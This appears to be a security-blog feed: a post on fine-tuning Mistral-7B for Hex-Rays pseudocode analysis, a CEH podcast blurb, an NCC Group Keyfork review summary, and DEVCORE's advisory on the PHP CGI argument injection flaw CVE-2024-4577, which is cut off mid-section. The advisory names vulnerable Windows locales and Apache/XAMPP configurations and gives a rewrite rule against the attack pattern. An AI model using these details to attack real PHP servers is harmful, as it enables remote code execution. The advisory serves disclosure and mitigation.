For this task, the knowledge domain is already known - we want to fine tune a model that can be used to aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset, this is the difficult part. At a high level the dataset that needs to be built will be made of "instruction-following" examples, for instance the following shows what this would look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples provide two types of instruction-following dataset entries. The first example starts by specifying the instruction to be followed with a matching input (user input) and finally the ideal output (generated result). The second example only provides an instruction along with an example output - the second example is useful for generative only responses that do not require user input, this type is not that useful for our current task but was included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact formatting in JSON will allow for using the datasets library from Hugging Face and is going to be a common format.

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function description from documentation, this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html) I decided to try the same style of approach. The basic idea of this workflow is to use a LLM to build your dataset based on a smaller dataset, or in this case an incomplete dataset and train against that:

After some noodling around I came up with the following high-level process:

  • compile libc with full debug/symbol information
  • load the compiled libraries into IDA and export all functions Hex-Rays output into individual files by address
  • strip the compiled libraries and repeat the previous step, exporting all functions Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

  • using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
  • create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
  • iterate over all the files until complete

After completing this step we have a large completed instruction-following dataset we can use to fine tune against.

Heavy Customization

There are quite a few options when it comes to carrying out a fine tune of a LLM, at the time of this research project I chose to use unsloth. The following projects are also popular and most likely more batteries-included:

I went with unsloth for a few reasons, the main reason being underlying code has been tuned to provide a large performance increase (speed/memory usage), also it seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions, at the time of this project the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adopted from the examples provided by unsloth, the script uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration will save a copy of the fine-tuned weights every 50 steps to a directory outputs - this is helpful for a few reasons. The first being if an error occurs at some point (crash/power/etc.) you have checkpoints you can restart your training from, the second being it allows you to effectively evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first, more steps are better, this is going to be dependent on how large your dataset is and which settings you have configured - more is not always better.

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this I take the first 10 entries from the training dataset and use the instruction and input values to generate a new output, as well as generating a new output using an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
# do x evals of items from the dataset before training
samples = []
sample_size = 10
for x in range(0,sample_size):
    instruction = dataset[x]["instruction"]
    input       = dataset[x]["input"]
    output      = ''
    text = alpaca_prompt.format(instruction, input, output) #+ EOS_TOKEN
    sample = tokenizer([text],return_tensors = "pt").to("cuda")
    out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
    out = tokenizer.batch_decode(out)
    samples.append(out[0])

# new one not in your dataset goes here
code = '''int __fastcall sub_75C80(int a1, int a2)
{
  int result; // r0
  _DWORD *i; // r3

  result = a2 - *(_DWORD *)(a1 + 12);
  for ( i = *(_DWORD **)(a1 + 48); i; i = (_DWORD *)*i )
  {
    if ( i[2] < result )
      result = i[2];
  }
  return result;
}'''

text = alpaca_prompt.format(instruction, code, output)
sample = tokenizer([text],return_tensors = "pt").to("cuda")
out = model.generate(**sample,max_new_tokens=4096,use_cache=True)
out = tokenizer.batch_decode(out)
samples.append(out[0])

print('Capturing pre training generation samples')
with open(f'results/eval_log_{model_name_input.replace("/","_")}','w') as log:
    for r in samples:
        log.write(r)

For running the script, it seemed easiest to just iterate over the checkpoints in outputs using bash:

for m in $(ls outputs); do python eval.py outputs/$m; done

Results?

So, with training out of the way, the question is, does it work? Initial testing was performed against the following input:

### Instruction:
Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.

### Input:
int __fastcall sub_B0D04(int a1, int a2)
{
  unsigned int v2; // r4
  int result; // r0

  v2 = a1 + a2;
  if ( __CFADD__(a1, a2) )
    return 0;
  result = _libc_alloca_cutoff();
  if ( v2 <= 0x1000 )
    return result | 1;
  return result;
}

As expected, the base model did not follow the requested format very well and the function comment is low quality. At 50 training steps, the model 'understands' the expected output and matches perfectly - the somewhat surprising result is that function comment is better at 50 steps compared to 100 steps.

Zooming out a bit and comparing further steps, the format is perfect while the most common error seen is confusion on what gets returned (value vs allocated memory) or inconsistent numeric format (1000 vs 0x1000):

The real check is, how does this compare to the big models...

It is interesting to see that GPT3.5 is no better than our results and in fact performs worse than our 50-step results, failing into the same error as the 100-step result.

Comparing against GPT3.5 feels slightly unfair as it is quite old, what about GPT4?

Well… that result definitely makes this whole exercise feel painful and pointless. The quality of the comment is much higher, and it also captured more variable renames. So, the end result is: just use GPT4, using a small local model is pointless.

Admitting Defeat and Using GPT4

So now that we tried our best with our small model, we can move on and just use GPT4, just not in the way you would expect. Going back and considering the Alpaca project, they call out using an existing strong language model to automatically generate instruction data, while so far we have used our small 7b parameter model to generate instruction data. This is where we step back slightly and redo some of our previous work, replace our 'low quality' generated data with 'high quality' values from the current leading model.

Using the OpenAI playground is fairly simple to set up an 'assistant' with our instructions:

With the configuration working as expected, its straight forward to use the API and execute the same original instruction generation we previously had done:

I originally had no expectations related to the cost of this process, to be safe I added 50$ to my account before executing the previous step, I was surprised when it only cost ~16$ at the time:

Seeing that it only cost 16$ for the initial run and the quality of the responses were good, I figured why not use both sets of data and get 2x the high-quality instruction datasets?

With the brand-new high-quality dataset complete we can back up and start a new fine tune of our mistral-7b model, in this case it has been trained for 200 steps taking snapshots every 50 steps. After training is complete, an evaluation was done against a new input that is not in either dataset against our old 'low-quality' fine tune and our new one.

At 50 steps the new GPT4 trained version has already performed much better at capturing variables to rename, interestingly the LLM trained dataset description contains more direct references to the code while the GPT4 description is slightly higher level:

At 100 steps the variable names for the GPT4 trained model are slightly better and the description is slightly more technical, referring to specific items within the code. The LLM trained model has picked up the extra variable renames, but they look to be in line with what the GPT4 trained model had at 50 steps. I also thought it was interesting that the LLM trained model refers to [2] as the third field (mathematically correct):

At 150 steps the GPT4 trained model has slightly improved the function description while maintaining the variable renames. The LLM trained model has improved the function name to match the GPT4 trained model at 50 steps, while losing variable renames - interestingly it now refers to [2] as the second element now:

Finally, at 200 steps the GPT4 trained model has slightly tweaked its description. The LLM trained model has rediscovered its variable renames from the 100 steps version and also refined how it references the [2] within the code:

Clearly the mistral-7b model fine-tuned against the high-quality dataset from GPT4 performs much better than the previous version. The real test is to now compare it with GPT4 directly......

That response looks like something we have seen already, at this point I would say we have proven it is feasible to fine tune a small local model to perform a specific task at the level of a much larger model.

Making Friends

So now that we have our fine-tuned local model, we need to hook it into IDA and feed it some Hex-Rays. There are a few other plugins that offer similar functionality:

I decided to write my own simple version, apologies in advance for any errors or poor design decisions, the underlying fine-tuned model is available to use with whatever you like best. Building off the previous simple python script shown earlier, I again choose to use Ollama's rest service instead of loading the model directly - I like this design for few reasons:

  • minimal Python requirements
  • the service can be running on a remote machine with more compute
  • reload/maintenance/update will not interrupt your weeks long IDA session
  • avoids tying IDA up with a large memory footprint, that one you have had running for weeks now :)

To set up Ollama to use the new model, download the weights and Modelfile in the same directory and configure Ollama:

% ollama create aidapal -f aidapal.modelfile
transferring model data
using existing layer sha256:d8ff55be57629cfb21d60d4977ffb6c09071104d08bce8b499e78b10481b0a3a
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
using existing layer sha256:0c3d95e257e4029eb818625dbf1627a4ca182eefcdbc360d75c108afda3cf458
using existing layer sha256:3da0ba8b21dda1aba779a536319f87fbed8ee78e80b403ce2c393cec6d58e1a9
creating new layer sha256:5fe21ec0a43781478cefd5a2b4b047651c889e08f1d7e4bf7e8bc5a7413e425a
writing manifest
success

Loading the plugin can be done through the IDA menu (File->Script File). After loading, the script provides a new context menu option when right-clicking within a Hex-Rays window:

In this example the plugin has been configured with a single model, if you have other models loaded within your Ollama service they can be added and will appear within the context menu as well. After activating the menu item, the plugin will query the selected model with the Hex-Rays code and return a dialog when it is complete:

Within this dialog all returned values can be accepted individually by selecting the checkbox (enabled by default) and clicking Accept, clicking Cancel will reject all and close the dialog.

In this example, the results are accepted and applied fully:

This example shows rejecting the function name and description, only applying the variable renames:

There is also nothing stopping you from accepting all changes multiple times:

Another consideration I had when creating aiDAPal was implementing some form of data lookup like Retrieval Augmented Generation (RAG), but in the spirit of keeping things simple I came up with the idea of treating the IDA database (IDB) as a lookup/knowledge base. The basic idea is whenever the plugin is activated, it will identify any references within the code that is being analyzed and retrieve any comments that exist at the target locations and include them as a multi-line comment before the function that is sent for analysis. An example of this workflow can be seen in the following image:

For this example, the WDT_ICR register location is queried for any comments, if one exists it gets extracted and included in our request. Something to consider is that in this case, the WDT_ICR register is common and is part of the 'base knowledge' stored within the original trained weights and would have be identified fine without the extra comment. This can be confirmed by querying the underlying model for this information:

% ollama run mistral:7b
>>> give me a single sentence description of the WDT_ICR register
 The WDT_ICR (Watchdog Timer Independent Counter Register) is a control register in the watchdog timer unit that triggers a reset upon being written, allowing configuring the watchdog timer's independent counter.

By using the IDB as an extra source of knowledge as shown previously, we can use our own information/knowledge to better guide the response. In the following image the comment associated with the WDT_ICR register has been changed, resulting in the model returning a different result that considers the additional knowledge that was provided by the IDB:

Currently, this functionality does not extract this information from comments that may be defined at the start of a function; while that would be useful and give context to the current analysis as to what a called function does, this would often result the inclusion of a large number of extra tokens potentially exhausting the underlying models context window and return low quality results.

The End?

While I am sure I made mistakes along the way, I hope this information is helpful to anyone wanting to fine-tune a LLM for local usage; whether that is making a better version of the one we are sharing or something completely different. It is also worth noting most of this project was executed earlier this year (feb/march), since then a handful of new models have been released that would be interesting to explore/adapt this research to (phi3-med/llama3/Codestral). If you made it this far, thanks for reading.

All files related to this project can be found on our GitHub (https://github.com/atredispartners/aidapal).

Inside a CEH boot camp: Advice from an Infosec instructor

By: Infosec
6 June 2024 at 18:00

Infosec and the Cyber Work Hacks podcast are here to help you pass the Certified Ethical Hacker (CEH) exam! So for today’s hack, we’re talking about bootcamps. The CEH exam, no matter how you slice it, is an exam that is the definition of the phrase, “It’s a marathon, not a sprint.” With 125 questions and four hours to answer them, there’s as much of a mental game at work here that’s much more than rote memorization of terms and tools. That’s why I wanted to get an insider’s look from Infosec boot camp instructor Akyl Phillips! Phillips will explain what the Infosec five-day CEH boot camp is like, the learning and retention strategies you’ll employ, and all the ways that bootcamp training can help you pass on the first try. Phillips has taught pentesters and red teamers at all levels from sheer beginners to people already in the field, and this episode is a look into how it works. Book yourself a front-row seat for another Cyber Work Hack.

0:00 - How to pass the CEH exam
3:17 - What is a CEH boot camp?
4:02 - Things to know before the CEH exam
5:30 - How does the CEH exam test practical skills?
6:46 - The day-to-day of an Infosec boot camp
11:08 - What is CEH exam day like?
12:14 - Is a cybersecurity boot camp right for me?
13:12 - Outro

– Get your FREE cybersecurity training resources: https://www.infosecinstitute.com/free
– View Cyber Work Podcast transcripts and additional episodes: https://www.infosecinstitute.com/podcast

About Infosec
Infosec’s mission is to put people at the center of cybersecurity. We help IT and security professionals advance their careers with skills development and certifications while empowering all employees with security awareness and phishing training to stay cyber-safe at work and home. More than 70% of the Fortune 500 have relied on Infosec Skills to develop their security talent, and more than 5 million learners worldwide are more cyber-resilient from Infosec IQ’s security awareness training. Learn more at infosecinstitute.com.

💾

Public Report – Keyfork Implementation Review

By: R.Rivera
6 June 2024 at 15:28

In April 2024, Distrust engaged NCC Group’s Cryptography Services team to perform a cryptographic security assessment of keyfork, described as “an opinionated and modular toolchain for generating and managing a wide range of cryptographic keys offline and on smartcards from a shared mnemonic phrase”. The tool is intended to be run on an air-gapped system and allows a user to split or recover a cryptographic key using Shamir Secret Sharing, with shares imported and exported using mechanisms such as mnemonics or QR codes. These shares can be managed by one or more users, with a defined threshold of shares required to recover the original secret. A retest was conducted in May 2024, which resulted in all findings and notes being marked Fixed.

The review targeted the tagged release keyfork-v0.1.0 of the keyfork repository. Distrust indicated that memory-related (e.g., zeroization) and timing-related attacks were not a concern due to the trusted nature of the hardware and its environment, and as such were not investigated in detail.

Several engagement notes and several low impact findings were uncovered, each of which were promptly addressed by Distrust.

資安通報:PHP 遠端程式碼執行 (CVE-2024-4577) - PHP CGI 參數注入弱點

5 June 2024 at 16:00

English Version, 中文版本

戴夫寇爾研究團隊在進行前瞻攻擊研究期間,發現 PHP 程式語言存在遠端程式碼執行弱點,基於 PHP 在網站生態使用的廣泛性以及此弱點之易重現性,研究團隊將此弱點標記為嚴重、並在第一時間回報給 PHP 官方。官方已在 2024/06/06 發佈修復版本,詳細時程可參閱漏洞回報時間軸

漏洞描述

PHP 程式語言在設計時忽略 Windows 作業系統內部對字元編碼轉換的 Best-Fit 特性,導致未認證的攻擊者可透過特定的字元序列繞過舊有 CVE-2012-1823 的保護;透過參數注入等攻擊在遠端 PHP 伺服器上執行任意程式碼。

影響範圍

此弱點影響安裝於 Windows 作業系統上所有的 PHP 版本,詳情可參照下表:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

由於 PHP 8.0 分支、PHP 7 以及 PHP 5 官方已不再維護,網站管理員可參考如何確認自己易遭受攻擊章節,並於修補建議找到暫時緩解措施。

如何確認自己易遭受攻擊?

對於常見之 Apache HTTP Server 加上 PHP 組合,網站管理員可透過此文章列出之兩個方式確認伺服器是否易被攻擊。其中,情境二也是 XAMPP for Windows 安裝時的預設設定,因此所有版本的 XAMPP for Windows 安裝也預設受此弱點影響。

在本文撰寫當下已驗證當 Windows 作業系統執行於下列語系時,未授權的攻擊者可直接在遠端伺服器上執行任意程式碼:

  • 繁體中文 (字碼頁 950)
  • 簡體中文 (字碼頁 936)
  • 日文 (字碼頁 932)

對於其它執行在英文、韓文、西歐語系之 Windows 作業系統,由於 PHP 使用情境廣泛、暫無法完全列舉並排除其利用情境,因此還是建議使用者全面盤點資產、確認使用情境並更新 PHP 至最新版本確保萬無一失!

情境一: 將 PHP 設定於 CGI 模式下執行

在 Apache Httpd 設定檔中透過 Action 語法將對應的 HTTP 請求交給 PHP-CGI 執行檔處理時,受此弱點影響,常見設定包含但不限於:

AddHandler cgi-script .php
Action cgi-script "/cgi-bin/php-cgi.exe"

<FilesMatch "\.php$">
    SetHandler application/x-httpd-php-cgi
</FilesMatch>

Action application/x-httpd-php-cgi "/php-cgi/php-cgi.exe"

情境二: 將 PHP 執行檔暴露在外 (XAMPP 預設安裝設定)

即使未設定 PHP 於 CGI 模式下執行,僅將 PHP 執行檔暴露在 CGI 目錄下也受此弱點影響,常見情況包含但不限於:

  1. php.exephp-cgi.exe 複製到 /cgi-bin/ 目錄中
  2. 將 PHP 安裝目錄透過 ScriptAlias 暴露到外,如:
     ScriptAlias /php-cgi/ "C:/xampp/php/"
    

修補建議

強烈建議所有使用者升級至 PHP 官方最新版本 8.3.88.2.208.1.29,對於無法升級的系統可透過下列方式暫時緩解弱點。

除此之外,由於 PHP CGI 已是一種過時且易於出現問題的架構,也建議評估遷移至較為安全的 Mod-PHP、FastCGI 或是 PHP-FPM 等架構可能性。

1. 對無法更新 PHP 的使用者

可透過下列 Rewrite 規則阻擋攻擊,請注意此份規則只作為繁體中文、簡體中文及日文語系中的暫時性緩解機制,實務上仍建議更新到已修復版本或更改架構。

RewriteEngine On
RewriteCond %{QUERY_STRING} ^%ad [NC]
RewriteRule .? - [F,L]

2. 對 XAMPP for Windows 使用者

在撰寫本文的當下,XAMPP 尚未針對此漏洞釋出相對應的更新安裝檔,如確認自身的 XAMPP 並無使用到 PHP CGI 之功能,可透過修改下列 Apache Httpd 設定檔以避免暴露在弱點中:

C:/xampp/apache/conf/extra/httpd-xampp.conf

找到相對應的設定行數:

ScriptAlias /php-cgi/ "C:/xampp/php/"

並將其註解:

# ScriptAlias /php-cgi/ "C:/xampp/php/"

漏洞回報時間軸

  • 2024/05/07 - DEVCORE 透過 PHP 官方弱點通報頁面回報此問題。
  • 2024/05/07 - PHP 開發者確認弱點並強調要盡快修復。
  • 2024/05/16 - PHP 開發者釋出第一版修復並尋求建議。
  • 2024/05/18 - PHP 開發者釋出第二版修復並尋求建議。
  • 2024/05/20 - PHP 進入新版本發布準備。
  • 2024/06/06 - PHP 發布新版本 8.3.88.2.208.1.29

參考資料

Security Alert: CVE-2024-4577 - PHP CGI Argument Injection Vulnerability

5 June 2024 at 16:00

English Version, 中文版本

During DEVCORE’s continuous offensive research, our team discovered a remote code execution vulnerability in PHP. Due to the widespread use of the programming language in the web ecosystem and the ease of exploitability, DEVCORE classified its severity as critical, and promptly reported it to the PHP official team. The official team released a patch on 2024/06/06. Please refer to the timeline for disclosure details.

Description

While implementing PHP, the team did not notice the Best-Fit feature of encoding conversion within the Windows operating system. This oversight allows unauthenticated attackers to bypass the previous protection of CVE-2012-1823 by specific character sequences. Arbitrary code can be executed on remote PHP servers through the argument injection attack.

Impact

This vulnerability affects all versions of PHP installed on the Windows operating system. Please refer to the table below for details:

  • PHP 8.3 < 8.3.8
  • PHP 8.2 < 8.2.20
  • PHP 8.1 < 8.1.29

Since the branch of PHP 8.0, PHP 7, and PHP 5 are End-of-Life, and are no longer maintained anymore, server admins can refer to the Am I Vulnerable section to find temporary patch recommendations in the Mitigation Measure section.

Am I Vulnerable?

For the usual case of combinations like Apache HTTP Server and PHP, server administrators can use the two methods listed in this article to determine whether their servers are vulnerable or not. It’s notable to address that Scenario-2 is also the default configuration for XAMPP for Windows, so all versions of XAMPP installations on Windows are vulnerable by default.

As of this writing, it has been verified that when the Windows is running in the following locales, an unauthorized attacker can directly execute arbitrary code on the remote server:

  • Traditional Chinese (Code Page 950)
  • Simplified Chinese (Code Page 936)
  • Japanese (Code Page 932)

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

Scenario 1: Running PHP under CGI mode

